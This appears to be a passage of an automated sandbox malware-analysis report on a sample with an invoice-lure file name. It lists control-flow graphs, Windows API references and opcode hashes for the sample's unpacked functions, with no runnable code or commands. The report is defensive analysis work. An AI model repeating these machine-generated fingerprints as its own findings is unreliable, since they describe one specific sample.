                                                                                                                                                                                                                                                                  • Opcode ID: 404713a002cd1fb1debadc58061aed167d73140adb080c5997cd101571107b08
                                                                                                                                                                                                                                                                  • Instruction ID: 12768a016321cf69415c7035f7a0e62cb3fdf56dc521195f855da0899e7af8a8
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 404713a002cd1fb1debadc58061aed167d73140adb080c5997cd101571107b08
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F5155B49002498FDB14CFA9C988BEEBBF1EF88314F248499E519A7250D774A944CF65
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B6D0
                                                                                                                                                                                                                                                                  • GetCurrentThread.KERNEL32 ref: 00B4B70D
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32 ref: 00B4B74A
                                                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 00B4B7A3
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2063062207-0
                                                                                                                                                                                                                                                                  • Opcode ID: 8ecb1425fcee38ebe226864a7983d282ea211213dc7f2b6b4ff9e1a6a16dd25e
                                                                                                                                                                                                                                                                  • Instruction ID: ad666a1dbdef280ca5d5666719b37cc36027f9d76ef42819e087a0f2dc9bebaf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ecb1425fcee38ebe226864a7983d282ea211213dc7f2b6b4ff9e1a6a16dd25e
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2419AB49043498FEB14CFA9C548BEEBBF1EF89308F248499E519A7361CB759D44CB21
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 58 77e76b3-77e8cc9 60 77e8ccf-77e8cd0 58->60 61 77e7e7b-77e7e80 58->61 62 77e7e8a 61->62 63 77e7e96-77e81b8 62->63 65 77e81c2-77e81d3 63->65 66 77e81db-77e81f7 65->66 67 77e81fd-77e8205 66->67 68 77e72a4-77e72aa 66->68 67->68 69 77e826e-77e828e 67->69 70 77e72ac 68->70 71 77e72b3-77e72b4 68->71 69->68 74 77e8294-77e829c 69->74 72 77e72c7-77e72d9 70->72 73 77e7605-77e7606 70->73 71->72 71->73 72->68 73->69 74->68
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$G$I
                                                                                                                                                                                                                                                                  • API String ID: 0-2086554180
                                                                                                                                                                                                                                                                  • Opcode ID: b1f32a740714d4fcb4d0bcb3f0d6d7a05c93bfca30bb0d863608631ea9426dd5
                                                                                                                                                                                                                                                                  • Instruction ID: bbec7ec07e0768bf29afc64a5940d0f38be0e151d5df82158cebc14098b17742
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1f32a740714d4fcb4d0bcb3f0d6d7a05c93bfca30bb0d863608631ea9426dd5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 962126B0D1A209CFDB28DF69C1487ADB7FDFB4A358F00A099D009AB245C7788984CF42
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 76 77e7e79-77e81d3 81 77e81db-77e81f7 76->81 82 77e81fd-77e8205 81->82 83 77e72a4-77e72aa 81->83 82->83 84 77e826e-77e828e 82->84 85 77e72ac 83->85 86 77e72b3-77e72b4 83->86 84->83 89 77e8294-77e829c 84->89 87 77e72c7-77e72d9 85->87 88 77e7605-77e7606 85->88 86->87 86->88 87->83 88->84 89->83
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$G$I
                                                                                                                                                                                                                                                                  • API String ID: 0-2086554180
                                                                                                                                                                                                                                                                  • Opcode ID: a74ece17a0c453f85fba447b72a073c020b58a1ead0bf5fbf2d9a0aa1d696bb8
                                                                                                                                                                                                                                                                  • Instruction ID: ab97f25d00001b0516e9012ef4a3b8a74f6f0fe181327b1dcd018d5317eb878b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a74ece17a0c453f85fba447b72a073c020b58a1ead0bf5fbf2d9a0aa1d696bb8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 571158B0C09309CFDB14DF68D0487AD7BBDFB4A344F00A196D009AB240C7788985CF11
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 91 77e801e-77e8026 92 77e826e-77e828e 91->92 93 77e8c3a-77e8c41 91->93 96 77e72a4-77e72aa 92->96 97 77e8294-77e829c 92->97 94 77e761e-77e762d 93->94 95 77e8c47-77e8c48 93->95 104 77e7639-77e7655 94->104 98 77e72ac 96->98 99 77e72b3-77e72b4 96->99 97->96 100 77e72c7-77e72d9 98->100 101 77e7605-77e7606 98->101 99->100 99->101 100->96 101->92 104->96 105 77e765b-77e7663 104->105 105->96
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$I$`
                                                                                                                                                                                                                                                                  • API String ID: 0-879951650
                                                                                                                                                                                                                                                                  • Opcode ID: a95de29f102b98f3489cc9e4305585c6c58291306f24bcba7b1fb471090423a6
                                                                                                                                                                                                                                                                  • Instruction ID: 84cfa898586c9e830435d5de273848d7a3a1096ff2dba414adafd128328d8604
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a95de29f102b98f3489cc9e4305585c6c58291306f24bcba7b1fb471090423a6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4E1105B0D09209CFDB28CF59C4487ADB7FDFB4A398F04A496D009AB290C3788995CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 106 77e761b-77e7623 107 77e762d 106->107 108 77e7639-77e7655 107->108 109 77e765b-77e7663 108->109 110 77e72a4-77e72aa 108->110 109->110 111 77e72ac 110->111 112 77e72b3-77e72b4 110->112 113 77e72c7-77e72d9 111->113 114 77e7605-77e828e 111->114 112->113 112->114 113->110 114->110 117 77e8294-77e829c 114->117 117->110
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$I$`
                                                                                                                                                                                                                                                                  • API String ID: 0-879951650
                                                                                                                                                                                                                                                                  • Opcode ID: 29794b2776d28085040cd62f3ea8baf3652930b1de92a9ebfe662b09da31994f
                                                                                                                                                                                                                                                                  • Instruction ID: 5087c5bfd89f324f6e8f839f8374a5c66c4456e46de8ac1bce13e652142d9495
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29794b2776d28085040cd62f3ea8baf3652930b1de92a9ebfe662b09da31994f
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F90108B0C09209CFDB18CF59D1587ADBBFDFB4A358F14909AE009AB641C3798995CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.373857298.00000000077E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077E0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_77e0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: >$I
                                                                                                                                                                                                                                                                  • API String ID: 0-794560794
                                                                                                                                                                                                                                                                  • Opcode ID: 7909e43d38f75c3834184623a0491d9fd03d3f4f860b4603e5471d853c9c1f4a
                                                                                                                                                                                                                                                                  • Instruction ID: bb552c9b669d743e66cfad517b03c134bdae70f8bb44ffba61ef8261f9cdd4d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7909e43d38f75c3834184623a0491d9fd03d3f4f860b4603e5471d853c9c1f4a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB116AB4D4921A8FDB14CF28C5447AD7BF8EB0A348F1090E6D019AB281C7789A81CF41
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 118 78cef30-78cef42 119 78cef6a-78cef6e 118->119 120 78cef44-78cef63 118->120 121 78cef7a-78cef89 119->121 122 78cef70-78cef72 119->122 120->119 124 78cef8b 121->124 125 78cef95-78cefc1 121->125 122->121 124->125 128 78cefc7-78cefcd 125->128 129 78cf1e2-78cf1f0 125->129 130 78cf096-78cf09a 128->130 131 78cefd3-78cefd9 128->131 142 78cf1a8-78cf1ab 129->142 143 78cf1f2 129->143 133 78cf09c-78cf0a5 130->133 134 78cf0bf-78cf0c8 130->134 131->129 135 78cefdf-78cefee 131->135 133->129 137 78cf0ab-78cf0bd 133->137 140 78cf0ed-78cf0f0 134->140 141 78cf0ca-78cf0ea 134->141 138 78ceff4-78cf000 135->138 139 78cf075-78cf07e 135->139 145 78cf0f3-78cf0f9 137->145 138->129 146 78cf006-78cf01d 138->146 139->129 144 78cf084-78cf090 139->144 140->145 141->140 149 78cf1ad-78cf1b6 142->149 150 78cf1b7-78cf1d0 142->150 147 78cf1fb-78cf227 143->147 148 78cf1f4-78cf1f9 143->148 144->130 144->131 145->129 154 78cf0ff-78cf114 145->154 151 78cf01f 146->151 152 78cf029-78cf03b 146->152 172 78cf23d-78cf249 147->172 173 78cf229 147->173 148->147 149->150 171 78cf1d8-78cf1df 150->171 151->152 152->139 165 78cf03d-78cf043 152->165 154->129 157 78cf11a-78cf12c 154->157 157->129 159 78cf132-78cf13f 157->159 159->129 163 78cf145-78cf15c 159->163 163->129 174 78cf162-78cf17a 163->174 166 78cf04f-78cf055 165->166 167 78cf045 165->167 166->129 168 78cf05b-78cf072 166->168 167->166 177 78cf24b 172->177 178 78cf255-78cf271 172->178 175 78cf22c-78cf22e 173->175 174->129 176 78cf17c-78cf187 174->176 179 78cf230-78cf23b 175->179 180 78cf272-78cf2af 175->180 176->171 181 78cf189-78cf193 176->181 177->178 179->172 179->175 188 78cf2cb-78cf2d7 180->188 189 78cf2b1-78cf2b4 180->189 181->171 185 78cf195-78cf1a6 181->185 185->142 192 78cf2d9 188->192 193 78cf2e3-78cf308 188->193 191 78cf2b7-78cf2c9 189->191 191->188 191->191 192->193 196 78cf37c-78cf382 193->196 197 78cf30a-78cf310 193->197 198 78cf3cf-78cf3e9 196->198 199 78cf384-78cf387 196->199 197->196 200 78cf312-78cf315 197->200 201 78cf3ec-78cf406 199->201 202 78cf389-78cf396 199->202 200->201 203 78cf31b-78cf328 200->203 214 78cf40f-78cf45b call 78c2920 call 78c1640 201->214 215 78cf408-78cf40d 201->215 206 78cf398-78cf3b0 202->206 207 78cf3c9-78cf3cd 202->207 204 78cf32a-78cf354 203->204 205 78cf376-78cf37a 203->205 209 78cf356 204->209 210 78cf360-78cf373 204->210 205->196 205->200 206->201 212 78cf3b2-78cf3c5 206->212 207->198 207->199 209->210 210->205 212->207 222 78cf45d-78cf460 214->222 223 78cf463-78cf469 214->223 215->214 222->223
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.375477473.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_78c0000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID: d
                                                                                                                                                                                                                                                                  • API String ID: 0-2564639436
                                                                                                                                                                                                                                                                  • Opcode ID: 623d617eb29b81c1403bcfb9958e9e7ad62447929be565aa0e134e81534ca1db
                                                                                                                                                                                                                                                                  • Instruction ID: 2da52f311f690ac980f2218b7141c3e51a1abe8bd96598a6140b461cf11976e1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 623d617eb29b81c1403bcfb9958e9e7ad62447929be565aa0e134e81534ca1db
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EA027AB5A006068FE710CF68C484A6AB7F2FF88314B25C66ED55ADB765CB30F941CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 224 b49670-b49685 call b481ec 227 b49687 224->227 228 b4969b-b4969f 224->228 279 b4968d call b498f8 227->279 280 b4968d call b498ea 227->280 229 b496a1-b496ab 228->229 230 b496b3-b496f4 228->230 229->230 235 b496f6-b496fe 230->235 236 b49701-b4970f 230->236 231 b49693-b49695 231->228 232 b497d0-b4984d 231->232 272 b49897 232->272 273 b4984f-b49890 232->273 235->236 238 b49711-b49716 236->238 239 b49733-b49735 236->239 241 b49721 238->241 242 b49718-b4971f call b481f8 238->242 240 b49738-b4973f 239->240 244 b49741-b49749 240->244 245 b4974c-b49753 240->245 243 b49723-b49731 241->243 242->243 243->240 244->245 249 b49755-b4975d 245->249 250 b49760-b49762 call b48208 245->250 249->250 253 b49767-b49769 250->253 255 b49776-b4977b 253->255 256 b4976b-b49773 253->256 257 b4977d-b49784 255->257 258 b49799-b497a6 255->258 256->255 257->258 260 b49786-b49796 call b48218 call b4925c 257->260 265 b497a8-b497c6 258->265 266 b497c9-b497cf 258->266 260->258 265->266 275 b49898-b498c3 GetModuleHandleW 272->275 274 b49892-b49895 273->274 273->275 274->272 276 b498c5-b498cb 275->276 277 b498cc-b498e0 275->277 276->277 279->231 280->231
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00B498B6
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: HandleModule
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                                                                                                                                                  • Opcode ID: 6c5e091df5ae0e01f4e96a0e38395b4185627b3458dc2a608c61dcf40f7e9954
                                                                                                                                                                                                                                                                  • Instruction ID: 5dd437427a2a3982b9c43dcd2b64f9459345d006d42a7e4bf6f5a1ead3487a1c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c5e091df5ae0e01f4e96a0e38395b4185627b3458dc2a608c61dcf40f7e9954
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB813570A10B058FD724DF6AD0417ABBBF1FF88344F00896ED44ADBA40DB74AA05CB91
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 281 b4fccc-b4fd3e 282 b4fd40-b4fd46 281->282 283 b4fd49-b4fd50 281->283 282->283 284 b4fd52-b4fd58 283->284 285 b4fd5b-b4fd93 283->285 284->285 286 b4fd9b-b4fdfa CreateWindowExW 285->286 287 b4fe03-b4fe3b 286->287 288 b4fdfc-b4fe02 286->288 292 b4fe3d-b4fe40 287->292 293 b4fe48 287->293 288->287 292->293 294 b4fe49 293->294 294->294
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B4FDEA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                                                                                                                  • Opcode ID: dd0add5d1f981dd1ee27559bbb612745a7118e89559ceffc3cd4f49c7af28970
                                                                                                                                                                                                                                                                  • Instruction ID: 0a18aaaf420721c7b215d633541f4b3d17f8a99c64710ebaae3e18d893230241
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd0add5d1f981dd1ee27559bbb612745a7118e89559ceffc3cd4f49c7af28970
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B351CFB1D10219DFDB14CFAAD884ADEBBF5FF48310F64852AE419AB210D774A945CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 295 b4fcd8-b4fd3e 296 b4fd40-b4fd46 295->296 297 b4fd49-b4fd50 295->297 296->297 298 b4fd52-b4fd58 297->298 299 b4fd5b-b4fdfa CreateWindowExW 297->299 298->299 301 b4fe03-b4fe3b 299->301 302 b4fdfc-b4fe02 299->302 306 b4fe3d-b4fe40 301->306 307 b4fe48 301->307 302->301 306->307 308 b4fe49 307->308 308->308
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 00B4FDEA
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: CreateWindow
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                                                                                                                                                  • Opcode ID: 29375de145df6db6befbbcad0d5596d554bf70a0a43b704992907cd4843dc240
                                                                                                                                                                                                                                                                  • Instruction ID: 86f0f2502d1cbd007e50a183bd8a1ee59199ac9c0594ffbec7ce8b50cc8cfd2c
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29375de145df6db6befbbcad0d5596d554bf70a0a43b704992907cd4843dc240
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B541CFB1D003199FDB14CFAAC884ADEBBF5FF48314F24852AE819AB210D774A945CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 309 b45344-b4534d 310 b45350-b45411 CreateActCtxA 309->310 312 b45413-b45419 310->312 313 b4541a-b45474 310->313 312->313 320 b45476-b45479 313->320 321 b45483-b45487 313->321 320->321 322 b45498 321->322 323 b45489-b45495 321->323 325 b45499 322->325 323->322 325->325
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B45401
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                  • Opcode ID: adebeccc844e0633a82a434efee647ec23864a47cf8d9dc40b9710239cf939c0
                                                                                                                                                                                                                                                                  • Instruction ID: f17fdb3a5b1c0ffa99ae69cd1a617d366b7235a1fb44c71141eeab94f1671e57
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: adebeccc844e0633a82a434efee647ec23864a47cf8d9dc40b9710239cf939c0
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B410371C00618CFDB24DFA9C884BDEBBB5FF48304F2180AAD448AB256D7B46946CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 326 b43de8-b45411 CreateActCtxA 329 b45413-b45419 326->329 330 b4541a-b45474 326->330 329->330 337 b45476-b45479 330->337 338 b45483-b45487 330->338 337->338 339 b45498 338->339 340 b45489-b45495 338->340 342 b45499 339->342 340->339 342->342
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateActCtxA.KERNEL32(?), ref: 00B45401
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Create
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2289755597-0
                                                                                                                                                                                                                                                                  • Opcode ID: 7db1cdcb8785b10a644874ef1b8a89831bbe68d2986eb450fd291c5e33d5b1c2
                                                                                                                                                                                                                                                                  • Instruction ID: 81ac7f75d80ad598228d95f0afe870ee775801d1888d04275b15885619cf7ee5
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7db1cdcb8785b10a644874ef1b8a89831bbe68d2986eb450fd291c5e33d5b1c2
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41F271C00718CBDB24DFA9C88479EBBF5BF48304F20806AD409AB256D7B56945CF90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 343 b4b890-b4b92c DuplicateHandle 344 b4b935-b4b952 343->344 345 b4b92e-b4b934 343->345 345->344
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4B91F
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.354048440.0000000000B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B40000, based on PE: false
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_b40000_Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: DuplicateHandle
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3793708945-0
                                                                                                                                                                                                                                                                  • Opcode ID: a23e67a8c2d67b356bb029d59f8801ac21133974ed7e1e857dc6ff75891cbd77
                                                                                                                                                                                                                                                                  • Instruction ID: aaed5f23a59f6555ae61ae4f9c4a2809def3b705cca681736a349698d08cc0b0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a23e67a8c2d67b356bb029d59f8801ac21133974ed7e1e857dc6ff75891cbd77
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8921F2B5900249AFDB10CFA9D884AEEBFF4EB48320F14845AE954A3210C378A955CF61
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 348 b4b898-b4b92c DuplicateHandle 349 b4b935-b4b952 348->349 350 b4b92e-b4b934 348->350 350->349
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B4B91F
                                                                                                                                                                                                                                                                  Memory Dump Source
